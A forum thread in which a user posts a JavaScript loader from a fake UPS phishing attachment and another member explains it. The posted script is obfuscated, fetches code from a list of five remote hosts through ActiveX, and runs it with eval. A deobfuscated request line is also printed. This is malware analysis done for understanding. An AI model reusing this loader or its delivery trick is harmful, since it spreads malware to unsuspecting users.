/    Sign up×
Community /Pin to ProfileBookmark

Received this Code as an Attachment in an Email and Was Wondering What it Does

Copy linkTweet thisAlerts:
Aug 24.2017

I received an email at my work email address that had an attachment. The body looked exactly like this (without the quotes):

“Dear Customer,
We can not deliver your parcel arrived at July 06.
Please check the attachment for details!
Thanks and best regards,
,
UPS Senior Office Manager.”

Now, it’s obviously not a legitimate email from UPS but I was curious what was in the attachment. It was a zip file containing a JavaScript file that was named “UPS-Package-2417924.doc” (the .doc was part of the filename, not the extension). I assume the “.doc” portion was to try to trick me into thinking it was a Word file so that I would open it.

I’m obviously not going to run this file but I don’t really know much about JavaScript, so I was just curious what this file would’ve done. Here is the code that was in the file:

[CODE]function nomusta(prototu){return prototu.replace(/AA/g,””);}
var zemk = ‘0000001FELhCxJErs1gdVzVBfoPJyaY9fasQovu502397400MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8Ffp5P7h-_sedxegmVG2HmyNEfZORvOa_FkQShvtOcXD9X9lBgG_Nivk7FWsAVxubHDD5tiwaMl7focgZZ9pSiKN7mA9RFlVmMKjAOCEk0ST5YWBByM0lNCD2sOPMfwDJrhjq9v99mB7Ur0rU6wyI1pClZQWNPfVdQYusKQ6UXp4bWql2HAKH34d2sPrn1cRKrUT3bF0wlo45EKouEzU7bNghbUahhwxRtLKDNLFqVDhOtz-A-CPpq3A34xZHZGkdKVImClOCUk3waXVDZMy4-xME6rQHqgaqMjU2xHin4YMC3xdaFiftzog61JIkg2xuB0mJXfZRHVAd2xUdqQgIQIDAQABLZQA8ZMqYFppY6hfDTF-fbo-4YntQ1d6ffAJaPSXGzXegX2bJyVvSmnEpSpWezH8__PnNoU8WeZndhNl0’;
var ruxk = ‘208f9056fa4a82dd53ca03b3e2468c8f’;
var kiron = 0;
var x = [“expert5.ru”,”serdcezemli.ru”,”blog.3yinaudio.com”,”infosoft.pl”,”bennuakar.com”];
var jacob = new Array(‘RESPAN’, ‘GET’, ‘MUSIDO’, ”);
var mustafa = x.length+0;
function zulum(pikue) {pikue.send();}
function malysh() {return nomusta(“htAAtAAp”);}
function rizma(kjg, lki) { return kjg.split(lki);}
function greezno() {return nomusta(‘counAAter’);}
function hust(gulibator){eval(gulibator);}
function kidok(heruim){return heruim.responseText;}
while(true)
{
if(kiron>=mustafa)
{
break;
}
try
{
var fuka = new ActiveXObject(nomusta(“MSXAAML2.XMLHTAATP”));
var ghyt = !true;
var gerlk = x[kiron];
fuka.open(jacob[3-2], “”+malysh()+”://”+gerlk+’/’+greezno()+’?’+zemk, ghyt);
zulum(fuka);
var gt = kidok(fuka);
var kimmich = gt.length;
var miffka = gt.indexOf(ruxk);
var miluoki = “a”+””;
if ((kimmich+0) > (8+1+1) * 100 && 2 == 2 && miffka + 3 > 2)
{
var gusar = rizma(gt, ruxk).join(miluoki);
hust(gusar);
break;
}
}
catch(e)
{
};
kiron++;
};[/CODE]

Can anyone tell me what this file was designed to do? Like I said, I’m not going to run it. I’m just curious what this person was trying to do. Any help is much appreciated. Thanks!

to post a comment
JavaScript

4 Comments(s)

Copy linkTweet thisAlerts:
@rootAug 25.2017 — Had another quickie at this, its a reasonable attempt at obfuscation on some elements, some methods employed like [B]"htAAtAAp"[/B] when passed to the function to extract the string, results in [B]http[/B] and I am guessing that this is enough to fool windows firewall or the firewall you use in to thinking that the scripting is safe.

In any case, the typical AJAX routine creates an ajax object that requests data and that data string is then chopped up with this [B]208f9056fa4a82dd53ca03b3e2468c8f[/B] value set in the variable [B]ruxk[/B] then the array is joined by the value set in [B]miluoki[/B] which is [B]a[/B], then this is passed through the [B]eval[/B] function, so this means that the data is likely to be another JavaScript as the payload with this script being the loader.

So now you know that it is loading scripts, the question of what is it doing is another question altogether. It depends on which URL it is pulling its data from, when you look at how the URL is determined, then you have a starting point, when you look at this part of the code var fuka = new ActiveXObject(nomusta("MSXAAML2.XMLHTAATP"));
var ghyt = !true;
var gerlk = x[kiron];
fuka.open(jacob[3-2], ""+malysh()+"://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);
zulum(fuka);
var gt = kidok(fuka); you can then see how the AJAX routine is working and that by how the routine is made up, it is looking like its targeted only at windows users by the way it uses ActiveX to make the AJAX object.

so
fuka = ActiveXObject("MSXML2.XMLHTTP");
var ghyt = !true;
var gerlk = x[kiron]; // gerlk = x[kiron] and kiron is 0, so gerlk = "expert5.ru"
fuka.open("GET", "http://expert5.ru/counter?0000001FELhCxJErs1gdVzVBfoPJyaY9fasQovu502397400MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8Ffp5P7h-_sedxegmVG2HmyNEfZORvOa_FkQShvtOcXD9X9lBgG_Nivk7FWsAVxubHDD5tiwaMl7focgZZ9pSiKN7mA9RFlVmMKjAOCEk0ST5YWBByM0lNCD2sOPMfwDJrhjq9v99mB7Ur0rU6wyI1pClZQWNPfVdQYusKQ6UXp4bWql2HAKH34d2sPrn1cRKrUT3bF0wlo45EKouEzU7bNghbUahhwxRtLKDNLFqVDhOtz-A-CPpq3A34xZHZGkdKVImClOCUk3waXVDZMy4-xME6rQHqgaqMjU2xHin4YMC3xdaFiftzog61JIkg2xuB0mJXfZRHVAd2xUdqQgIQIDAQABLZQA8ZMqYFppY6hfDTF-fbo-4YntQ1d6ffAJaPSXGzXegX2bJyVvSmnEpSpWezH8__PnNoU8WeZndhNl0", false);
fuka.send();
gt = fuka.responseText;


false is used to make the routine wait for a reply, so no need for the onreadystate change for async type loading, it makes sure that the script is loaded so that the script can then use the response without those state change checks. Thats why the responseText return is after the send() request.

The routine is nested in a [B]try .. catch[/B] container to stop the script from breaking if an erro is encountered during the loader attempts to load from the various URL's the various payloads. this is contained in a [B]while(true)[/B] loop which increments the kiron counter to then attempt to load another payload.

So I had a little dig to try and coax the server to honour my request and got an empty page, so I am figuring that the server has some preventative measures from casual poking around. So I grabbed some header information HTTP/1.1 200 OK =>

Date => Fri, 25 Aug 2017 11:48:15 GMT

Server => Apache/2.2.15 (Red Hat) mod_rpaf/0.6 PHP/5.4.30

X-Powered-By => PHP/5.4.30

Content-Length => 0

Connection => close

Content-Type => text/html; charset=UTF-8[/quote] and as you can see,
Copy linkTweet thisAlerts:
@rootAug 25.2017 — , there is a live server but its not playing ball...
Copy linkTweet thisAlerts:
@TheAdamBomb7authorAug 25.2017 — Wow, thank you for the quick and detailed response. I appreciate it.

So, I'm not 100% sure I understand what's happening though. Is the ajax object requesting data from me and then sending it to the server, like a keylogger or something? Or is it just communicating with the server, sending data back and forth, and trying to perform some unknown function (unknown due to the server being inaccessible I assume)?
Copy linkTweet thisAlerts:
@rootAug 25.2017 — It is getting a response from the server, thats what the script is doing, getting scripts from several servers and running them by using eval()
×

Success!

Help @TheAdamBomb7 spread the word by sharing this article on Twitter...

Tweet This
Sign in
Forgot password?
Sign in with TwitchSign in with GithubCreate Account
about: ({
version: 0.1.9 BETA 5.18,
whats_new: community page,
up_next: more Davinci•003 tasks,
coming_soon: events calendar,
social: @webDeveloperHQ
});

legal: ({
terms: of use,
privacy: policy
});
changelog: (
version: 0.1.9,
notes: added community page

version: 0.1.8,
notes: added Davinci•003

version: 0.1.7,
notes: upvote answers to bounties

version: 0.1.6,
notes: article editor refresh
)...
recent_tips: (
tipper: @AriseFacilitySolutions09,
tipped: article
amount: 1000 SATS,

tipper: @Yussuf4331,
tipped: article
amount: 1000 SATS,

tipper: @darkwebsites540,
tipped: article
amount: 10 SATS,
)...